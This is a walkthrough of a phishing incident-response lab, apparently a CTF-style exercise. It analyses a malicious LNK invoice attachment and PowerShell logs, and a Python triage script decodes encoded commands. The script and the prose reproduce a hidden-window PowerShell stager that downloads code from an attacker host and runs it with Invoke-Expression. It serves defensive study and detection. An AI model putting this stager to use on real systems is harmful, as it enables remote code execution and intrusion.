Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.

The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
You are tasked to analyse and assess the impact of the compromise.
Open the email via Thunderbird, and you can see the following details:
Save the attachment and extract it, then run the following command in the directory where the extracted files are saved:
lnkparse Invoice_20230103.lnk

Inside the attachment, there is the Invoice_20230103.lnk file.
The Invoice_20230103.lnk file has a payload:
Use CyberChef to decode it:

This tells us that the payload means: “Run PowerShell quietly, without showing a window or loading any user-specific settings. Then, create a WebClient object that reaches out to a remote URL (http://files.bpakcaging.xyz/update) and downloads the text content from that URL. Finally, run that downloaded content as code using Invoke-Expression.”
Open powershell.json to analyze the logs. We’ll use the jq tool to work with the JSON files, focusing on the "ScriptBlockText" value, since this field contains the scripts that were run on the system. Run this command to gather more information:
jq -c '{ScriptBlockText}' powershell.json | sort -u
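The two analysis steps above (decoding the -enc payload from the LNK file, and pulling unique ScriptBlockText values out of powershell.json) can be scripted so the decode happens automatically for every script block. The following is an added Python example, not part of the original walkthrough or of any tool it uses. It constructs its own sample powershell.json lines (newline-delimited JSON with a ScriptBlockText field, as Event ID 4104 script block logging produces) and re-encodes a command matching the one described above; the only value taken from the page is the download URL http://files.bpakcaging.xyz/update. The helper names (decode_encoded_command, unique_script_blocks, triage_script_blocks) are this example's own.

```python
import base64
import json
import re
from typing import Optional

# Constructed sample: the decoded command the walkthrough describes, re-encoded the
# way PowerShell's -EncodedCommand expects it (UTF-16LE text wrapped in base64).
DECODED_CMD = "iex (New-Object Net.WebClient).DownloadString('http://files.bpakcaging.xyz/update')"
ENCODED_CMD = base64.b64encode(DECODED_CMD.encode("utf-16le")).decode("ascii")

# Constructed powershell.json content: one JSON event per line, like the real export.
SAMPLE_POWERSHELL_JSON = "\n".join([
    json.dumps({"EventID": 4104, "ScriptBlockText": "Get-Process"}),
    json.dumps({"EventID": 4104, "ScriptBlockText":
                f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_CMD}"}),
    json.dumps({"EventID": 4104, "ScriptBlockText": "Get-Process"}),  # duplicate, removed by dedup
    json.dumps({"EventID": 4104, "ScriptBlockText": DECODED_CMD}),     # stage logged after decode
])

URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Common spellings of the -EncodedCommand switch seen on command lines.
ENC_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument: base64 wrapping UTF-16LE text."""
    return base64.b64decode(blob).decode("utf-16le")


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded payload if the command line carries -enc <base64>, else None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            try:
                return decode_encoded_command(tokens[i + 1])
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def unique_script_blocks(ndjson_text: str) -> list:
    """Same result as: jq -c '{ScriptBlockText}' powershell.json | sort -u"""
    seen = set()
    for line in ndjson_text.splitlines():
        if not line.strip():
            continue
        text = json.loads(line).get("ScriptBlockText")
        if text is not None:
            seen.add(text)
    return sorted(seen)


def triage_script_blocks(ndjson_text: str) -> list:
    """For each unique script block, decode any -enc payload and record the indicators in it."""
    findings = []
    for block in unique_script_blocks(ndjson_text):
        decoded = extract_encoded_command(block)
        effective = decoded if decoded is not None else block
        findings.append({
            "script": block,
            "decoded": decoded,
            "hidden_window": bool(re.search(r"-w(indowstyle)?\s+hidden", block, re.I)),
            "urls": URL_RE.findall(effective),
            "uses_iex": bool(re.search(r"\b(iex|invoke-expression)\b", effective, re.I)),
        })
    return findings


if __name__ == "__main__":
    for finding in triage_script_blocks(SAMPLE_POWERSHELL_JSON):
        print(json.dumps(finding, indent=2))
```

Running it on a real export is a matter of replacing SAMPLE_POWERSHELL_JSON with the file contents; the urls field gives the download locations to search for in proxy and DNS logs, and hidden_window plus uses_iex together flag the stager pattern described above.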